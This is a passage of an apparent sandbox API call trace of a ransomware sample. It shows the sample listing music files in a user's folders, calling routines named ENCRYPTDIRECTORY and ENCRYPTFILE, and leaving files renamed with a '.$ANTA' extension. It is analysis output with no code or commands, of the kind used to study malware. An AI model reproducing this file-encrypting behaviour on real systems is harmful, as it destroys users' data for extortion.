(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.135] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd896870, ftCreationTime.dwHighDateTime=0x1d5e460, ftLastAccessTime.dwLowDateTime=0xcd2a4b80, ftLastAccessTime.dwHighDateTime=0x1d5eeda, ftLastWriteTime.dwLowDateTime=0xcd2a4b80, ftLastWriteTime.dwHighDateTime=0x1d5eeda, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="A-LWlY-3UKn4PQ_Otnq", cAlternateFileName="A-LWLY~1")) returned 1 [0116.135] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0116.135] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0116.136] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.136] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.136] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0116.136] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.136] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.136] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.136] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f04dda, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x10f04dda, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x10fe9ae7, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x13ae0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="g4kPqWyZSQA5pz.wav.$ANTA", cAlternateFileName="G4KPQW~1.$AN")) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.137] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.137] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0116.137] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.137] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.137] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11376eba, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x11376eba, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x114f467f, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x132f0, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="zMKZMHlWmMpV7lZ.m4a.$ANTA", cAlternateFileName="ZMKZMH~1.$AN")) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.137] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0116.138] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0116.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0116.138] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0116.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0116.138] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.138] FindNextFileW (in: hFindFile=0x41abfc0, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e28a0, ftCreationTime.dwHighDateTime=0x144eb40, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e28a0, ftLastWriteTime.dwLowDateTime=0x43e9350, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="", cAlternateFileName="Xнńဓ+\x10")) returned 0 [0116.138] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0116.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|-a1fx91SeT 48T|A-LWlY-3UKn4PQ_Otnq", cchCount1=35, lpString2="", cchCount2=0) returned 3 [0116.138] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0116.138] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0116.138] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t")) returned 0x10 [0116.138] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e07b50, ftCreationTime.dwHighDateTime=0x1d5ef8e, ftLastAccessTime.dwLowDateTime=0x16f59510, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0x16f59510, ftLastWriteTime.dwHighDateTime=0x1d5ede3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca9a0, cFileName=".", cAlternateFileName="")) returned 0x41ac540 [0116.138] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa3e07b50, ftCreationTime.dwHighDateTime=0x1d5ef8e, ftLastAccessTime.dwLowDateTime=0x16f59510, ftLastAccessTime.dwHighDateTime=0x1d5ede3, ftLastWriteTime.dwLowDateTime=0x16f59510, ftLastWriteTime.dwHighDateTime=0x1d5ede3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca9a0, cFileName="..", cAlternateFileName="")) returned 1 [0116.139] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f501380, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xab2dfb80, ftLastAccessTime.dwHighDateTime=0x1d5ef2a, ftLastWriteTime.dwLowDateTime=0xab2dfb80, ftLastWriteTime.dwHighDateTime=0x1d5ef2a, nFileSizeHigh=0x0, nFileSizeLow=0x17256, dwReserved0=0x0, dwReserved1=0x43ca9a0, cFileName="HkFnDV.mp3", cAlternateFileName="")) returned 1 [0116.139] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb787e6b0, ftCreationTime.dwHighDateTime=0x1d5e99a, ftLastAccessTime.dwLowDateTime=0x9ec83740, ftLastAccessTime.dwHighDateTime=0x1d5ea37, ftLastWriteTime.dwLowDateTime=0x9ec83740, ftLastWriteTime.dwHighDateTime=0x1d5ea37, nFileSizeHigh=0x0, nFileSizeLow=0xbb73, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="kEfh1XIhHEyxIZI.m4a", cAlternateFileName="KEFH1X~1.M4A")) returned 1 [0116.139] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec66c2c0, ftCreationTime.dwHighDateTime=0x1d5ec1a, ftLastAccessTime.dwLowDateTime=0x880af980, ftLastAccessTime.dwHighDateTime=0x1d5e79d, ftLastWriteTime.dwLowDateTime=0x880af980, ftLastWriteTime.dwHighDateTime=0x1d5e79d, nFileSizeHigh=0x0, nFileSizeLow=0x708a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="mzZHZq983SYlb.mp3", cAlternateFileName="MZZHZQ~1.MP3")) returned 1 [0116.139] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ab12ae0, ftCreationTime.dwHighDateTime=0x1d5efe8, ftLastAccessTime.dwLowDateTime=0xb730d540, ftLastAccessTime.dwHighDateTime=0x1d5e103, ftLastWriteTime.dwLowDateTime=0xb730d540, ftLastWriteTime.dwHighDateTime=0x1d5e103, nFileSizeHigh=0x0, nFileSizeLow=0x12108, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="ssO YlBHXom4.mp3", cAlternateFileName="SSOYLB~1.MP3")) returned 1 [0116.139] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2840, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0xb, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3574, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="ミмńဓ+\x10")) returned 0 [0116.139] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0116.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|HkFnDV.mp3|kEfh1XIhHEyxIZI.m4a|mzZHZq983SYlb.mp3|ssO YlBHXom4.mp3", cchCount1=66, lpString2="", cchCount2=0) returned 3 [0116.139] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0116.139] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3", lpFindFileData=0x144e970 | out: lpFindFileData=0x144e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f501380, ftCreationTime.dwHighDateTime=0x1d5e810, ftLastAccessTime.dwLowDateTime=0xab2dfb80, ftLastAccessTime.dwHighDateTime=0x1d5ef2a, ftLastWriteTime.dwLowDateTime=0xab2dfb80, ftLastWriteTime.dwHighDateTime=0x1d5ef2a, nFileSizeHigh=0x0, nFileSizeLow=0x17256, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="HkFnDV.mp3", cAlternateFileName="")) returned 0x41ac040 [0116.139] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0116.139] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0116.139] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0116.139] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0116.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cacd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0116.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\HkFnDV.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\hkfndv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0116.141] FreeLibrary (hLibModule=0x772d0000) returned 1 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9350 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0116.141] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0116.141] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0116.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0116.142] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0116.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0116.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0116.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0116.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0116.142] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0116.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.142] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0116.143] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.143] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0116.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.143] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0116.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0116.143] HeapFree (in: hHeap=0x1780000, 